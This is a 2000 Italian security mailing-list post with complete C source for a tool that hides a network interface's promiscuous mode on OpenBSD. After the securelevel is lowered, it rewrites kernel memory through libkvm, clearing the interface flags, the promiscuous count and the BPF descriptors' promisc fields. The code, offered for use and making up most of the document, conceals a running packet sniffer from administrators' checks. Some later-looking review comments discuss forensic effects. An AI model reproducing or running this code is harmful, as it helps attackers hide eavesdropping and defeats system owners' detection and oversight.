

Archivio: Maggio 2000 ml@sikurezza.org
Soggetto: Oscurita' del promisc mode in OpenBSD
Mittente: pig
Data: 23 May 2000 07:55:57 -0000


ecco il prog che oscura il promisc mode in OpenBSD... le condizioni di
validita' sono + o - le stesse di quelle x FreeBSD messe in bfi 8...

Anche qui, come nell'lkm, dovete cambiare il securelevel per poter 
accedere a /dev/mem... e scriverci (con securelevel maggiore di 0
/dev/mem e /dev/kmem non sono scrivibili) ...

Il procedimento e' quello di coprire tutte le informazioni relative 
all'interfaccia promiscua sia nella struttura ifnet che nei descrittori
di bpf... sperando che l'allframes bit dell'interfaccia di rete resti
attivo il piu' possibile :)

bye

pig

-----------------------------------------------

SoftProject - Digital Security for Y2K
Sikurezza.org - Italian Security Mailing List
DeadHead - Going where the water tastes like wine 

enwhay allway ethay ardscay areway ownday
erethay'say othingnay eftlay otay eesay
erethay'say ustjay ethay avementpay eftlay
andway okenbray eamsdray.
/*
 * Name: Promisc Mode Obscurity via kvm 
 * Date: May 23 03:46:51 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject Digital Security for Y2K
 * Sikurezza.org Italian Security Mailing List
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
 *
 * Tested on: OpenBSD 2.6 kern#0 i386
 *
 * cc obsd_obscura.c -lkvm
 */

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <kvm.h> 
#include <err.h>
#include <sysexits.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/bpfdesc.h>

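/*
 * Print a fixed diagnostic through errx(3) and exit with EX_UNAVAILABLE.
 *
 * x is passed as data for a "%s" format rather than as the format string
 * itself, so a '%' in the message can never be interpreted as a
 * conversion.  The do { } while (0) wrapper makes the macro expand to a
 * single statement: the caller supplies the terminating ';', and the
 * macro stays correct in front of an "else".
 */
#define	Error(x)	do { errx(EX_UNAVAILABLE, "%s", (x)); } while (0)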

/*
 * Symbol request table handed to kvm_nlist() in main().
 *
 * Entry 0 asks for the kernel symbol "_ifnet"; main() reads the resolved
 * address back from list[0].n_value and uses it as the location of the
 * interface list head.  The entry with a NULL name ends the table.
 */
struct nlist list[] = {
	{"_ifnet"},
	{NULL}
};


/*
 * Print the program banner followed by a one-line synopsis built from
 * arg, then terminate the process with exit status 0.
 *
 * arg - program name shown in the synopsis (main() passes argv[0]).
 *
 * Does not return.
 */
void
usage(char *arg)
{
	static const char banner[] =
		"OpenBSD - Promisc Total Obscurity\n"
		"---------------------------------\n\n"
		"Coded By pIGpEN / s0FtPj Y2k\n\n";

	fputs(banner, stdout);
	fprintf(stdout, "%s <interface>\n", arg);

	exit(0);
}

/*
 * Walk the list of BPF descriptors attached to one interface and clear
 * the bd_promisc field of every descriptor that has it set, directly in
 * kernel memory.
 *
 * kd  - libkvm handle; main() opens it with O_RDWR.
 * ifp - pointer to a userland COPY of the kernel's struct ifnet.  Only
 *       ifp->if_bpf is used, and it is used as a kernel address.
 *
 * For each struct bpf_d reached through ibpf.bif_dlist / bd_next the
 * function copies the descriptor out with kvm_read(), prints one status
 * line, and, when bd_promisc is non-zero, zeroes it and writes the
 * descriptor back with kvm_write().
 *
 * Forensic reading: once this has run, bd_promisc no longer records which
 * listener requested promiscuous mode, so that field is not usable as
 * evidence of a capture process on the interface.
 *
 * NOTE(review): no kvm_read()/kvm_write() return value is checked.  If a
 * read fails, ibpf or dbpf keep indeterminate stack contents and the loop
 * goes on to use the pointer values found in them.
 * NOTE(review): the whole struct bpf_d is written back, not only the one
 * changed field, so anything the kernel modified in that descriptor
 * between the read and the write is replaced by the stale copy.
 */
void
bpf_zero(kvm_t *kd, struct ifnet *ifp)
{
	struct bpf_if	ibpf;		/* local copy of the interface's bpf_if */
	struct bpf_d	dbpf, *pdbpf;	/* local copy / kernel address of a descriptor */
	int count = 0;			/* 1-based listener number for the report */

	/* Copy the bpf_if that the interface points at out of kernel memory. */
	kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf);

	/* pdbpf is always a kernel address; it is only dereferenced via kvm_*. */
	for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) {
		kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
		printf("#%d listener has %s promisc mode enabled",
				++count, (!dbpf.bd_promisc) ? "no " : " ");

		if(dbpf.bd_promisc) {
			printf(" (changed)");
			dbpf.bd_promisc = 0;
			/* Read-modify-write of the full descriptor, see NOTE above. */
			kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
		}

		putchar('\n');
	}
}



/*
 * Entry point: find the interface named argv[1] in the kernel's interface
 * list and clear its promiscuous-mode bookkeeping through libkvm.
 *
 * Steps, as written below:
 *   1. kvm_open() with O_RDWR, i.e. kernel memory opened for writing.
 *   2. kvm_nlist() resolves "_ifnet" (see list[]); a zero n_value aborts.
 *   3. The list head is copied out and every struct ifnet is read in turn.
 *   4. On a name match with IFF_PROMISC set: if_pcount is forced to 0,
 *      IFF_PROMISC is cleared from if_flags, the struct is written back,
 *      and bpf_zero() is run on the interface's BPF descriptors.
 *
 * Returns 0 whenever the end is reached, including when the interface was
 * not found or was not promiscuous.  kvm_open()/kvm_nlist() failures exit
 * through Error() with EX_UNAVAILABLE.
 *
 * What this means for detection: only software state (struct ifnet and
 * struct bpf_d fields) is rewritten; nothing in this file reprograms the
 * network hardware.  After a run, the interface flags and the promiscuous
 * reference count held in struct ifnet no longer reflect what the adapter
 * is doing, so checks that only read those fields are not conclusive.
 * The write path depends on kernel memory being writable; the post that
 * accompanies this listing notes that the securelevel has to be changed
 * for that, so a host that stays at a raised securelevel refuses step 1.
 *
 * NOTE(review): kvm_read()/kvm_write() results are never checked; after a
 * failed read, ifh or ifc hold indeterminate data that the loop then uses
 * as list pointers and as the interface name.
 */
int
main(int argc, char **argv)
{
	kvm_t *kd;			/* libkvm handle */
	struct ifnet_head ifh;		/* local copy of the list head at _ifnet */
	struct ifnet ifc, *ifp;		/* local copy / kernel address of an interface */

	if(argc != 2)
		usage(argv[0]);
	
	/*
	 * NULL file arguments: presumably the running kernel and the default
	 * memory device, per kvm_open(3) - confirm against the local manual.
	 * argv[0] is passed as the last (error string) argument.
	 */
	if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0]))) 
		Error("kvm_open()");

	if(kvm_nlist(kd, list) == -1)
		Error("kvm_nlist()");

	/* A zero address means the symbol was not resolved. */
	if(!list[0].n_value)
		Error("checking n_value");

	kvm_read(kd, list[0].n_value, &ifh, sizeof ifh);
	
	/* ifp is a kernel address; ifc is the userland snapshot of *ifp. */
	for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) {

		kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc);
		
		if(!strcmp(argv[1], ifc.if_xname)) {
			printf("%s found ... promisc mode ", ifc.if_xname);
			if(ifc.if_flags & IFF_PROMISC) {
				printf("(found)\n");

				if(ifc.if_pcount) 
				/* Like in FreeBSD version, you can do a 
				 * perfect thing by decreasing for each 
				 * descriptor found
				 */
					ifc.if_pcount = 0;

				ifc.if_flags &= ~IFF_PROMISC;

				/*
				 * The complete snapshot is written back, so any
				 * field the kernel changed since the kvm_read()
				 * above is overwritten with the older value.
				 */
				kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc);
				printf("BPF Analysis for %s interface\n",
						ifc.if_xname);
				/* Passes the local copy; bpf_zero() uses only its if_bpf. */
				bpf_zero(kd, &ifc);
			}else
				printf("(not found)\n");

		}else
			printf("skipping -> %s\n", ifc.if_xname);
	}

	kvm_close(kd);

	return 0;
}


